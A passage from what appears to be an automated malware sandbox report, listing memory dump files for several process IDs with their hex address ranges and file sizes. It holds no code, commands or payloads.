                                                        Filesize

                                                        1.5MB

                                                      • memory/1184-306-0x00007FFD78270000-0x00007FFD78859000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/1184-307-0x00007FFD8C7C0000-0x00007FFD8C7E3000-memory.dmp

                                                        Filesize

                                                        140KB

                                                      • memory/1184-329-0x00007FFD8C6C0000-0x00007FFD8C6CD000-memory.dmp

                                                        Filesize

                                                        52KB

                                                      • memory/1184-328-0x00007FFD87B80000-0x00007FFD87B99000-memory.dmp

                                                        Filesize

                                                        100KB

                                                      • memory/1184-327-0x00007FFD77E40000-0x00007FFD77FB7000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                      • memory/1184-326-0x00007FFD87750000-0x00007FFD87773000-memory.dmp

                                                        Filesize

                                                        140KB

                                                      • memory/1184-325-0x00007FFD8B690000-0x00007FFD8B6A9000-memory.dmp

                                                        Filesize

                                                        100KB

                                                      • memory/1184-324-0x00007FFD877D0000-0x00007FFD877FD000-memory.dmp

                                                        Filesize

                                                        180KB

                                                      • memory/1184-323-0x00007FFD908C0000-0x00007FFD908CF000-memory.dmp

                                                        Filesize

                                                        60KB

                                                      • memory/1184-322-0x00007FFD8B700000-0x00007FFD8B70D000-memory.dmp

                                                        Filesize

                                                        52KB

                                                      • memory/1184-321-0x00007FFD874C0000-0x00007FFD874F3000-memory.dmp

                                                        Filesize

                                                        204KB

                                                      • memory/1184-316-0x00007FFD77920000-0x00007FFD77E40000-memory.dmp

                                                        Filesize

                                                        5.1MB

                                                      • memory/1692-236-0x0000020F4F730000-0x0000020F4F94C000-memory.dmp

                                                        Filesize

                                                        2.1MB

                                                      • memory/2996-122-0x00000163CD630000-0x00000163CD652000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/2996-174-0x00000163CD510000-0x00000163CD518000-memory.dmp

                                                        Filesize

                                                        32KB